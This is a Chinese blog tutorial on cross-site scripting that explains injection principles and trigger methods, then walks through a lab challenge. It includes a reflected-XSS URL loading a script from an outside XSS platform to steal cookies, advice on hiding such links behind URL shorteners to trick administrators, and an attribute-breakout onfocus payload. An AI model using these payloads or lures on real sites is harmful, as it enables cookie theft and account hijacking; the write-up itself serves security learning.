XSS的原理分析与解剖

最新推荐文章于 2022-04-13 17:19:14 发布
最新推荐文章于 2022-04-13 17:19:14 发布
阅读量382 收藏 3
点赞数 1
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51313985/article/details/117169894
版权

什么是XSS?
XSS可以理解为前端代码注入(前端代码包括HTML,CSS,JavaScript)
注入攻击的本质,是把用户输入的数据当做代码执行。
这里有两个关键条件:
第一个是用户能够控制输入
第二个是原本程序要执行的代码,拼接了用户输入的数据

那么XSS主要拼接的是什么?
SQL注入拼接的是操作数据库的SQL语句。
XSS拼接的是网页的HTML代码,一般而言我们是可以拼接合适的HTML代码去执行恶意的JS语句(总结: xss就是拼接恶意的HTML)

XSS能做什么?
盗取Cookie(用的最频繁的)
获取内网ip
截取网页屏幕
获取浏览器保存的明文密码
网页上的键盘记录.

XSS的类型
反射型XSS(你提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击) --用户自己传参了恶意代码才能触发
存储型XSS(你提交的数据成功的实现了XSS,存入了数据库,别人访问这个页面的时候就会自动触发)
DOM型XSS (比较复杂,后面学到了再补充)

前端与后端
前端的核心在于展示,将页面展示给你看
后端的核心在于处理,满足功能要求
而前面所说的前端代码
HTML【骨架】
CSS【衣服】
JavaScript【操纵浏览器,达成一些功能】

如果你可以证明你自己能够任意操纵网页上的JS,那么他就有XSS漏洞
JS触发
1.
所以你得诱导别人去传参这个标签
2.伪协议触发
伪:假的东西–>不大众的协议 weishi:// telnet:// php:// javascript:// 在特定的地方触发
http:// ftp:// https:// -->大家都认可的协议 在每一个地方都能触发
例如上面的javascript:alert(1)
<a ·href=“http://www.baidu.com” >baidu</ a>
这里你在页面上看到的是baidu的字样点进去就跳转到了百度的网站,因为里面的超链接是百度的网址
baidu</ a>
如果是这样就是一个为协议触发,点进去就触发了XSS,因为源码存储的语句就是上面的
3.事件触发
由于某个原因导致了事件的发生
事件触发的是Js语句·on
例如:<img src=“https:/ /www.baidu.com/ imgPCtm d9c8750bed0b3c7d089fa7d55720d6cf.png” ·οnlοad=alert(1)/>
这里加载的是百度的一张图片,如果成功加载就触发XSS,这里的事件可以有很多种比如加载失败的时候触发

这个时候你肯定想拿个站点试试XSS,这个时候你可以去找一个免费的XSS平台,但是注意这个平台是别人搭建的,你在偷别人Cookie的同时它可能也会偷你的Cookie,所以用的时候最好开个无痕浏览模式,这里我也懒得演示了,有兴趣的自己去试一试

今天主要是说反射型XSS
反射型XSS
让别人访问链接然后触发
例如:192.168.222.131/a.php?a=<sCRiPt%20sRC=//xsshs.cn/PhpU>
反射型的危害要比存储型的低, 为什么这么说因为你想偷到管理员的Cookie的话你得去诱骗管理员点它,但管理员又不是傻子,这个链接一看就不正经我怎么会去点
在这里插入图片描述
所以我们可以用短链接去迷惑别人
在这里插入图片描述
可以随便找个生成短链接的平台就行
http://22j.co/es6M 这样看起来是不是就正经多了,然后在配上些文字
在这里插入图片描述
在这里插入图片描述

既然是偷Cookie,那我们能偷什么网站的Cookie呢?
这里强调一个东西:
同源性法则
同源:同协议、同Ip(域名)、同端口

那么上靶场吧
在这里插入图片描述
在这里插入图片描述
XSS见框就插
1.传参
2.看输出点
在这里插入图片描述
这里我们输入的东西上面显示出来了,说明它没有被当作代码执行
那它是什么情况呢,右键检查看一下
在这里插入图片描述
这里看着都很正常,那我们在右键编辑一下
在这里插入图片描述
在这里插入图片描述
这里我们发现它被转码了<>尖括号消失了,说明这里尖括号不能用
那这里标签就不能触发了,还有两种伪协议和事件触发
这里明显的是伪协议也用不了,我们没a标签和herf
但是事件触发也得在标签里,所以这里就不存在XSS,因为它过滤了
怎么办?
寻找输出点
在这里插入图片描述
在这里插入图片描述
我们发现框里输入的东西在url栏里也get传参
我们单独输入个尖括号看看会不会过滤
在这里插入图片描述
我们看到它在双引号里面,试试闭合掉双引号
在这里插入图片描述
然后发现它把双引号给转义了
那我们试试单引号
在这里插入图片描述
我们发现框里面的单引号不见了,说明它触发成功了
为什么可以用单引号触发?
前端代码是展示给用户看的,所以前端具有很高的容错性,它会把很多不合理的代码变的合理
我们右键检查所看到的代码不是真的
真实的代码我们要右键查看网页源码
在这里插入图片描述
源码这里写的就是单引号,而右键检查看到的是双引号
搞清楚这些之后我们用单引号闭合然后用oninput去触发,这里的意思就是在输入框里输入东西就触发
在这里插入图片描述
在这里插入图片描述
在里面随便输个东西就能触发
在这里插入图片描述
在这里插入图片描述
成功拿到flag,但这种操作条件有点苛刻要干着干那的,还得输入东西
这里有个骚姿势,焦点触发,输入进去之后它自动触发
payload : ’ οnfοcus=alert(1) autofocus //
当input输入框获取焦点时执行(onfocus)
在这里插入图片描述
在这里插入图片描述
直接弹窗

未完待续…

bay0net
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS攻击
vergilben的学习日记
04-03 2138
简介XSS 跨站脚本攻击XSS(cross site script),为了避免与css混淆,所以简称XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。XSS是指恶意攻击者利用网站没有对用户1提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某种动作或者对访问...
XSS漏洞注入,分类,防御方法
最新发布
yy1715713348的博客
04-24 1137
❤️其实不是项目上的要求,实际中我们没必要专门花时间去只找XSS漏洞,因为如果找到了反射型XSS像补天或者是漏洞盒子等都是不收的,除非有只收XSS漏洞的!因为要实现漏洞得与管理员交互,而且危害性较小!像标签风格的有些游览器会拦截,即使你过了游览器这关,还有网站开发这关,一般会过滤测试XSS漏洞关键在善于看网站源码,通过网站源码给你的信息来进行测试,并且要善于找输出点,这些地方都是需要重点排查的。
XSS原理分析解剖(一)
weixin_34329187的博客
09-09 268
0×01 前言: 《xss攻击手法》一开始在互联网上资料并不多(都是现成的代码,没有从基础的开始),直到刺的《白帽子讲WEB安全》和cn4rry的《XSS跨站脚本攻击剖析与防御》才开始好转。 我这里就不说什么xss的历史什么东西了,xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需...
XSS分析
草儿也忧伤的博客
04-02 212
反射型xss 1、反射型xss ①、low 漏洞代码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' ...
XSS的深入分析
weixin_45937436的博客
11-27 411
什么是xss漏洞 XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
XSS平台传输原理
Playwin
03-23 1855
前言:抽个时间,查看了一下自己搭的XSS平台(项目来源)传输数据的原理,究竟是怎样盗取cookie 生成一个盗取cookie的cookie.js 分析源码 cookie.js创建一个预加载对象,带着你的cookie等一些数据去访问服务器(xss平台) index.php接受你传过来的数据 测试 抓包,查看数据 总结 在能插入js代码的网页,插入恶意链接,利用该网站的身份发出请...
XSS原理分析解剖.doc
09-29
XSS原理分析解剖.doc
xss基本原理分析
03-17
DOM型XSS与前两种不同,它不涉及服务器的交互,而是利用了JavaScript的DOM(Document Object Model)特性。攻击者可以通过修改页面的DOM结构,导致JavaScript引擎执行恶意代码。这种类型的XSS通常源于开发者对用户...
PHP如何防止XSS攻击与XSS攻击原理的讲解
01-02
原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。 理论上,只要存在能...
xss特殊字符拦截与过滤
04-01
滤除content中的危险 HTML 代码, 主要是脚本代码, 滚动字幕代码以及脚本事件处理代码
xss漏洞分析
qq_43814486的博客
05-08 516
xss名字来源: xss又叫跨站脚本攻击,英文(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)混淆,所以将跨站脚本攻击命名为XSS。 其实xss叫”跨站脚本攻击“ 这个名字很随意,仅仅是因为最开始时黑客们演示xss漏洞的时候用的是“跨站”的植入脚本这种方式,所以才叫这个名,现在浏览器都默认执行“同源策略”,xss漏洞很难再去...
XSS的工作原理
weixin_44186370的博客
08-20 554
XSS的工作原理 2.1 XSS的概述 XSS跨站脚本攻击是将Java script代码插入web页面中,之后当用户浏览页面时, 会执行嵌套在web页面里面的Java script代码,从而达到攻击用户的目的。为了跟HTML里面的层叠样式表(CSS)作区分,所以叫作XSS,是客户端脚本安全中的头号大敌。 2.2 XSS攻击的危害 (1) 网站钓鱼,盗取各类账号 (2) 通过盗取Cookie文件,来读取Cookie文件里面的隐私信息或者以利用管理员身份进行登陆,最后进行篡改、添加、删除数据的等违法行为。 (3
网络安全从入门到精通(第七章-1)XSS原理分析解剖
划水的小白白
02-06 1973
本文内容: ~XSS原理与特性 ~反射型XSS及其实战注意
xss原理及简单介绍
weixin_30657541的博客
10-22 125
XSS简单介绍—Web攻击 一 ·基础介绍 xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 二·分类 (一)持久型/存储型 非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用...
XSS原理剖析
GHost_7的博客
07-15 240
1、XSS的本质 用户输入的数据被当作前端代码执行 2、XSS的作用(包括但不限于) 获取Cookie 获取内网IP 获取浏览器保存的明文密码 截取网页屏幕 网页上的键盘记录 3、XSS最核心的目的:偷Cookie 偷取对方的Cookie,并将Cookie发送出去 4、同源策略 浏览器为了防止Cookie之间产生错乱 同源规则: 同协议 同端口 同IP 同域名 XSS只能触发当前页面的Cookie 5、XSS的三大类型 反射型 存储型 Dom型 6、JS代码有三种触发方法 标签法: &
XSS漏洞报告
dongbule的专栏
04-22 466
对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心。 一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的htm...
3-1XSS基本概念和原理介绍
山兔的博客
04-13 876
跨站脚本漏洞-目录  跨站脚本漏洞概述  跨站脚本漏洞类型及测试流程  反射型XSS(get&post)演示和原理分析  存储型XSS演示和与原理分析  Dom型XSS演示和原理分析XSS的危害-获取cookie的原理和实验演示  XSS危害-XSS进行钓鱼的原理和实验演示  XSS危害-XSS获取键盘记录原理和实验演示  XSS盲打演示和原理分析 前端千遍万化,导致xss会出现很多千奇百怪的场景  XSS的过滤和绕过(filter&htmlspecialchars)
xss攻击原理与解决方法
06-03
XSS攻击的原理是,攻击者在受害者访问的网页中插入一些恶意代码,当用户浏览该网页时,浏览器会执行这些恶意代码,从而让攻击者获得用户的敏感信息或者控制用户的账户。 为了防止XSS攻击,我们可以采取以下措施: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值